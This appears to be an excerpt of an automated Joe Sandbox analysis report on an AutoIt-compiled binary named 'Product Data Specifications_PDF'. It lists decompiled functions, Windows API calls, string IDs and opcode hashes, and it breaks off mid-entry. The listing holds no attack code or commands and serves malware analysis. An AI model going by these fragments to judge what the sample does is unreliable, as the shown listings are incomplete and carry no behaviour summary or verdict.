                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll$__wcsnicmp
                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                              • API String ID: 790654849-32604322
                              • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                              • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                              • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                              • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                              Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                              • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                              • Opcode Fuzzy Hash: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                              • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                              Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                              • _fseek.LIBCMT ref: 00452B3B
                              • __wsplitpath.LIBCMT ref: 00452B9B
                              • _wcscpy.LIBCMT ref: 00452BB0
                              • _wcscat.LIBCMT ref: 00452BC5
                              • __wsplitpath.LIBCMT ref: 00452BEF
                              • _wcscat.LIBCMT ref: 00452C07
                              • _wcscat.LIBCMT ref: 00452C1C
                              • __fread_nolock.LIBCMT ref: 00452C53
                              • __fread_nolock.LIBCMT ref: 00452C64
                              • __fread_nolock.LIBCMT ref: 00452C83
                              • __fread_nolock.LIBCMT ref: 00452C94
                              • __fread_nolock.LIBCMT ref: 00452CB5
                              • __fread_nolock.LIBCMT ref: 00452CC6
                              • __fread_nolock.LIBCMT ref: 00452CD7
                              • __fread_nolock.LIBCMT ref: 00452CE8
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                              • __fread_nolock.LIBCMT ref: 00452D78
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                              • String ID:
                              • API String ID: 2054058615-0
                              • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                              • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                              • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                              • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                              Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                              Download Yara Rule
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window
                              • String ID: 0
                              • API String ID: 2353593579-4108050209
                              • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                              • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                              • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                              • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                              Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetSysColor.USER32(0000000F), ref: 0044A05E
                              • GetClientRect.USER32(?,?), ref: 0044A0D1
                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                              • GetWindowDC.USER32(?), ref: 0044A0F6
                              • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                              • ReleaseDC.USER32(?,?), ref: 0044A11B
                              • GetSysColor.USER32(0000000F), ref: 0044A131
                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                              • GetSysColor.USER32(0000000F), ref: 0044A14F
                              • GetSysColor.USER32(00000005), ref: 0044A15B
                              • GetWindowDC.USER32(?), ref: 0044A1BE
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                              • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                              • ReleaseDC.USER32(?,00000000), ref: 0044A229
                              • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                              • GetSysColor.USER32(00000008), ref: 0044A265
                              • SetTextColor.GDI32(?,00000000), ref: 0044A270
                              • SetBkMode.GDI32(?,00000001), ref: 0044A282
                              • GetStockObject.GDI32(00000005), ref: 0044A28A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                              • String ID:
                              • API String ID: 1744303182-0
                              • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                              • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                              • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                              • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                              Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                              • __mtterm.LIBCMT ref: 00417C34
                                • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                              • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                              • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                              • __init_pointers.LIBCMT ref: 00417CE6
                              • __calloc_crt.LIBCMT ref: 00417D54
                              • GetCurrentThreadId.KERNEL32 ref: 00417D80
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                              • API String ID: 4163708885-3819984048
                              • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                              • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                              • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                              • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                              Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID: >>>AUTOIT SCRIPT<<<$\
                              • API String ID: 0-1896584978
                              • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                              • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                              • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                              • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                              Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll$IconLoad
                              • String ID: blank$info$question$stop$warning
                              • API String ID: 2485277191-404129466
                              • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                              • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                              • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                              • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                              Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • LoadIconW.USER32(?,00000063), ref: 0045464C
                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                              • SetWindowTextW.USER32(?,?), ref: 00454678
                              • GetDlgItem.USER32(?,000003EA), ref: 00454690
                              • SetWindowTextW.USER32(00000000,?), ref: 00454697
                              • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                              • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                              • GetWindowRect.USER32(?,?), ref: 004546F5
                              • SetWindowTextW.USER32(?,?), ref: 00454765
                              • GetDesktopWindow.USER32 ref: 0045476F
                              • GetWindowRect.USER32(00000000), ref: 00454776
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                              • GetClientRect.USER32(?,?), ref: 004547D2
                              • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                              • String ID:
                              • API String ID: 3869813825-0
                              • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                              • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                              • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                              • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                              Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                              Download Yara Rule
                              APIs
                              • _wcslen.LIBCMT ref: 00464B28
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                              • _wcslen.LIBCMT ref: 00464C28
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                              • _wcslen.LIBCMT ref: 00464CBA
                              • _wcslen.LIBCMT ref: 00464CD0
                              • _wcslen.LIBCMT ref: 00464CEF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$Directory$CurrentSystem
                              • String ID: D
                              • API String ID: 1914653954-2746444292
                              • Opcode ID: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                              • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                              • Opcode Fuzzy Hash: 99bcfad45e429ddb70241ec9039d6b00caad823fb5156a30212311c37a62d784
                              • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                              Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll
                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                              • API String ID: 3832890014-4202584635
                              • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                              • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                              • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                              • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                              Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                              Download Yara Rule
                              APIs
                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                              • GetFocus.USER32 ref: 0046A0DD
                              • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessagePost$CtrlFocus
                              • String ID: 0
                              • API String ID: 1534620443-4108050209
                              • Opcode ID: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                              • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                              • Opcode Fuzzy Hash: d723a9665293e74c71492fb3cac70a3bc48f92968cf52f94e307062bf2672283
                              • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                              Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                              Download Yara Rule
                              APIs
                              • DestroyWindow.USER32(?), ref: 004558E3
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$CreateDestroy
                              • String ID: ,$tooltips_class32
                              • API String ID: 1109047481-3856767331
                              • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                              • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                              • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                              • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                              Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                              • GetMenuItemCount.USER32(?), ref: 00468C45
                              • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                              • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                              • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                              • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                              • GetMenuItemCount.USER32 ref: 00468CFD
                              • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                              • GetCursorPos.USER32(?), ref: 00468D3F
                              • SetForegroundWindow.USER32(?), ref: 00468D49
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                              Strings
                              Memory Dump Source
